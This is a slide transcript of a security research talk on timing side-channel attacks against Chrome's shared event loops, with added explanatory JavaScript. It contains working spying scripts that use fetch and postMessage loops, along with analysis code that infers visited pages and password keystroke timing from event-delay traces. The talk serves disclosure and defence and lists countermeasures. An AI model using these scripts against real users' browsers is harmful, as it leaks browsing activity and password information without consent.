Loophole: Timing Attacks on Shared Event Loops in Chrome (Pepe Vila) - PowerPoint PPT Presentation


SLIDE 1

Loophole: Timing Attacks on Shared Event Loops in Chrome

Pepe Vila and Boris Köpf

vwzq.net @cgvwzq github.com/cgvwzq

SLIDES 2-5

DISCLAIMER:

CRYPTACUS

(it’s funny because it’s very ubiquitous…)

SLIDE 6

Event-driven programming

SLIDE 7

Source: http://berb.github.io/diploma-thesis/original/042_serverarch.html

SLIDES 8-29

Shared Event Loop

[Animated diagram: a FIFO queue feeding a single Dispatcher, drawn along a time axis. Events e0, e1, e2, e3, e4 are enqueued and dispatched one at a time, each running to completion before the next is taken. The gaps d0, d1, d2, d3 between consecutive dispatches form the Event-delay trace.]

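The diagram above is easier to reason about with a small discrete-event simulation of the shared loop, written from the attacker's side. This is an added example, not code from the talk or from the Loophole tooling: the attacker re-queues one event each time its previous one is dispatched and records the dispatch time, a victim sharing the loop queues its own events, and the gaps between the attacker's timestamps are the event-delay trace. Event costs, the re-queue lag and the victim's events are constructed parameters in microseconds, not measurements.

```javascript
// Added example (not from the talk or the Loophole code): a discrete-event
// simulation of a shared FIFO event loop seen from the attacker's side.
// The attacker re-queues one event each time its previous one is dispatched
// and records the dispatch time; a victim sharing the loop queues its own
// events. The gaps between the attacker's timestamps are the event-delay trace.

// Constructed parameters, all in microseconds (assumptions, not measurements).
const ATTACKER_EVENT_COST = 5;  // time the dispatcher spends on one attacker event
const ATTACKER_REQUEUE_LAG = 1; // time until the attacker's next event is queued

// victimEvents: [{arrival, cost}] = when each victim event is queued and how
// long it occupies the dispatcher. Returns the attacker's dispatch timestamps.
function simulateSharedLoop(victimEvents, horizon) {
  // Events that exist but have not yet reached the FIFO, ordered by arrival.
  const arrivals = victimEvents.map(v => ({ ...v, owner: 'victim' }));
  arrivals.push({ arrival: 0, cost: ATTACKER_EVENT_COST, owner: 'attacker' });
  const queue = [];       // the shared FIFO
  const timestamps = [];  // attacker's view: when each of its events ran
  let clock = 0;

  while (true) {
    // Everything that has arrived by now joins the FIFO in arrival order.
    arrivals.sort((a, b) => a.arrival - b.arrival);
    while (arrivals.length && arrivals[0].arrival <= clock) queue.push(arrivals.shift());
    if (queue.length === 0) {
      if (arrivals.length === 0) break;  // nothing left to dispatch
      clock = arrivals[0].arrival;       // loop is idle: skip to the next arrival
      continue;
    }
    const ev = queue.shift();            // dispatcher takes the head of the FIFO
    if (ev.owner === 'attacker') {
      timestamps.push(clock);
      const next = clock + ev.cost + ATTACKER_REQUEUE_LAG;
      if (next <= horizon) {
        arrivals.push({ arrival: next, cost: ATTACKER_EVENT_COST, owner: 'attacker' });
      }
    }
    clock += ev.cost;  // the event runs to completion; there is no preemption
  }
  return timestamps;
}

// The event-delay trace of the slides: d_i = t_{i+1} - t_i.
function delayTrace(timestamps) {
  const d = [];
  for (let i = 1; i < timestamps.length; i++) d.push(timestamps[i] - timestamps[i - 1]);
  return d;
}

// Constructed victim: two events of 40 µs and 20 µs queued at t=100 and t=200.
const VICTIM_EVENTS = [{ arrival: 100, cost: 40 }, { arrival: 200, cost: 20 }];
const TRACE = delayTrace(simulateSharedLoop(VICTIM_EVENTS, 300));
console.log(TRACE.join(' '));
```

With an idle loop every delay equals the attacker's own cost plus the re-queue lag (6 µs here); each victim event shows up as one enlarged delay equal to the victim's cost plus the attacker's cost, which is the signal every attack in the talk is built on.
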
SLIDES 30-35

We exploit 2 different shared Event Loops in Chrome:
  • the I/O thread of the Host Process
  • the main thread of the Renderers

And implement 3 different attacks:
  • Page Identification
  • Inter-keystroke Timing
  • Covert Channel

[Plot: event-delay trace recorded during keystrokes, delays on a log scale against time; shown again on slide 56.]

SLIDES 36-41

[Diagram: SYSTEM/INTERNET, HOST PROCESS, and the renderers below it.]

HOST PROCESS (talks to SYSTEM/INTERNET):
  • NETWORK REQUESTS
  • IPC COMMUNICATION
  • DISPATCHES USER ACTIONS

The host process is SHARED BETWEEN ALL RENDERERS:
  RENDERER 1: tab 1 | trusted.com
  RENDERER 2: tab 2 | evil.com

SLIDES 42-43

Spying on the Host

<script>
  // Each iteration records a timestamp and issues a request that is routed
  // through the host process and fails; the rejection handler re-enters the
  // loop, so every timestamp marks when our turn on the host's I/O thread came.
  const trace = [];
  function save(t) { trace.push(t); }
  function loop() {
    save(performance.now());
    fetch(new Request("http://0/")).catch(loop);
  }
  loop();
</script>

Timing resolution of ~500 μs
With SharedWorkers we obtain <100 μs

SLIDES 44-47

[Diagram: SYSTEM/INTERNET, HOST PROCESS, RENDERER 1 hosting tab 1 | trusted.com.]

RENDERER 1 (tab 1 | trusted.com):
  • JAVASCRIPT EXECUTION
  • RESOURCE PARSING
  • LAYOUT & RENDERING

The renderer's main thread is SHARED BETWEEN IFRAMES, POPUPS, and whatever gets co-located once the MAX #RENDERERS is EXCEEDED…

Here: an iframe | evil.co embedded in tab 1 | trusted.com runs on the same renderer.

SLIDE 48

Spying on the Renderer

<script>
  // Posting a message to ourselves queues a task on the renderer's main
  // thread; the handler re-enters the loop, so each timestamp marks when our
  // turn on the shared main thread came around.
  const trace = [];
  function save(t) { trace.push(t); }
  function loop() {
    save(performance.now());
    self.postMessage(0, "*");
  }
  self.onmessage = loop;
  loop();
</script>

Timing resolution of <25 μs

slide-49
SLIDE 49

LoopScan Tool

https://github.com/cgvwzq/loopscan

slide-50
SLIDE 50

Web Page Identification & Inter-keystroke Timing

slide-51
SLIDE 51

Web Page Identification

Monitor the EventLoop while page loading

slide-52
SLIDE 52

Dynamic Time Warping

DTW is resistant to delays in the occurrence of events

slide-53
SLIDE 53

Dynamic Time Warping

DTW is resistant to delays in the occurrence of events

2-4 seconds of measuring

slide-54
SLIDE 54

Dynamic Time Warping

DTW is resistant to delays in the occurrence of events

2-4 seconds of measuring One trace for training

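To show why DTW rather than a position-by-position distance is the right tool for matching delay traces, here is a worked classifier. It is an added example, not the talk's R code: a standard DTW distance, a nearest-template classifier with one training trace per page (as the slides describe), and constructed traces in which a later visit to the same page does the same work two events later. The page labels and all trace values are invented for illustration.

```javascript
// Added example (not from the talk or the Loophole R library): dynamic time
// warping (DTW) as the distance between event-delay traces, with a
// nearest-template classifier for page identification. The traces below are
// constructed, not recorded; delays are in microseconds.

// DTW distance: minimal total |a_i - b_j| over monotone alignments of a and b,
// so a stretch of one trace may match one element of the other. Delaying an
// event (shifting a spike along the trace) costs nothing; changing its size does.
function dtwDistance(a, b) {
  const n = a.length, m = b.length;
  let prev = new Array(m + 1).fill(Infinity);
  prev[0] = 0;  // empty prefixes align at zero cost
  for (let i = 1; i <= n; i++) {
    const cur = new Array(m + 1).fill(Infinity);
    for (let j = 1; j <= m; j++) {
      const cost = Math.abs(a[i - 1] - b[j - 1]);
      cur[j] = cost + Math.min(prev[j], cur[j - 1], prev[j - 1]);
    }
    prev = cur;
  }
  return prev[m];
}

// Plain Euclidean distance for comparison; it only matches equal positions.
function euclideanDistance(a, b) {
  if (a.length !== b.length) throw new Error('Euclidean distance needs equal lengths');
  return Math.sqrt(a.reduce((s, x, i) => s + (x - b[i]) ** 2, 0));
}

// One training trace per page: return the label of the closest template.
function classify(trace, templates, distance = dtwDistance) {
  let best = null, bestDist = Infinity;
  for (const [label, template] of Object.entries(templates)) {
    const d = distance(trace, template);
    if (d < bestDist) { best = label; bestDist = d; }
  }
  return { label: best, distance: bestDist };
}

// Constructed templates: a flat 6 µs loop with spikes where the page's loading
// work lands on the shared loop. Labels are hypothetical.
const TEMPLATES = {
  pageA: [6, 6, 6, 40, 6, 6, 6, 6, 25, 6, 6, 6],
  pageB: [6, 6, 6, 6, 6, 6, 30, 6, 6, 6, 6, 6],
};
// A later visit to pageA: the same work, but everything lands two events later.
const OBSERVED = [6, 6, 6, 6, 6, 40, 6, 6, 6, 6, 25, 6];

console.log('DTW       ->', classify(OBSERVED, TEMPLATES).label);
console.log('Euclidean ->', classify(OBSERVED, TEMPLATES, euclideanDistance).label);
```

The shifted trace has DTW distance 0 to its own page's template, while the Euclidean distance penalises the shift twice (once where the spike was expected, once where it landed) and picks the wrong page. Real traces are noisy, so the distances are not exactly zero, but the ordering is what the classifier depends on.
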
SLIDE 55

Web Page Identification

500 pages x 30 traces x 3 machines x 2 event loops

Renderer’s main thread: 75% (Linux desktop)
Host’s I/O thread: 23% (Macbook Pro)

(recognition rates below 5% across machines)

R-library and datasets: https://github.com/cgvwzq/rlang-loophole

SLIDE 56

Inter-keystroke Timing

[Plot: event-delay trace captured while a password is typed; delays on a log scale against time, with one spike per key press.]

We obtain the password length and the time between consecutive pressed keys

SLIDES 57-58

Inter-keystroke Timing

10,000 passwords, 90% accuracy, precision: σ = 6.1 ms

  • More precision than network-based attacks.
  • Less noise than in micro-architectural attacks.
  • No privileges. No training.

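The analysis step behind these two slides, as an added example (not the talk's code): given the timestamps collected by a loop like the one on slide 42, find the turns where the attacker's delay jumped far above the loop period, treat each such stall as one key event dispatched by the host process, and read off the password length and the inter-keystroke intervals. The trace is constructed here to mimic a 500 µs loop; the stall per key event (KEY_STALL_US) and the key times are assumptions, and a real trace would need the threshold tuned against the measured baseline noise.

```javascript
// Added example (not from the talk): recovering keystroke count and
// inter-keystroke intervals from an event-delay trace. The trace is
// constructed to mimic the ~500 µs fetch()-based loop on the host I/O thread:
// the attacker's turn comes every LOOP_PERIOD_US, and when the host process
// dispatches a key event first, the attacker's next turn is stalled.
// All times are in microseconds.

const LOOP_PERIOD_US = 500;  // resolution of the host I/O loop (slide 42)
const KEY_STALL_US = 2300;   // assumed extra delay caused by one key event

// Constructed trace: attacker timestamps up to `durationUs`, with a stall
// after every period in which a key event (keyTimesUs) reaches the host loop.
function constructTrace(keyTimesUs, durationUs) {
  const keys = [...keyTimesUs].sort((a, b) => a - b);
  const timestamps = [];
  let t = 0, k = 0;
  while (t <= durationUs) {
    timestamps.push(t);
    let next = t + LOOP_PERIOD_US;
    // Every key event arriving before our next turn delays that turn.
    while (k < keys.length && keys[k] < next) { next += KEY_STALL_US; k++; }
    t = next;
  }
  return timestamps;
}

// Attacker-side analysis: a delay well above the loop period means someone
// else ran on the shared loop. Each stall is taken as one keystroke,
// timestamped by the attacker's last turn before it (error < one period).
function recoverKeystrokes(timestamps, thresholdUs = 2 * LOOP_PERIOD_US) {
  const keyTurns = [];
  for (let i = 1; i < timestamps.length; i++) {
    if (timestamps[i] - timestamps[i - 1] > thresholdUs) keyTurns.push(timestamps[i - 1]);
  }
  const intervalsUs = keyTurns.slice(1).map((t, i) => t - keyTurns[i]);
  return { passwordLength: keyTurns.length, intervalsUs };
}

// Constructed 5-character password typed over about 0.6 s.
const TRUE_KEY_TIMES_US = [120000, 235000, 310000, 470000, 560000];
const RESULT = recoverKeystrokes(constructTrace(TRUE_KEY_TIMES_US, 600000));
console.log(RESULT);
```

Each recovered interval is within one loop period (500 µs) of the true one, which is where the resolution figures on slides 42 and 43 come from: the finer the attacker's loop, the tighter the bound on each keystroke time.
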
SLIDES 59-60

Countermeasures

  • Reduce clock resolution
  • Site Isolation Project
  • CPU throttling
  • Rate limiting

SLIDE 61

Conclusions

  • Shared event loops in Chrome are vulnerable to timing side-channels
  • We systematically study how this channel can be used for different attacks
  • Fundamental design issues that need to be addressed

SLIDE 62

Thank you! :)

Questions?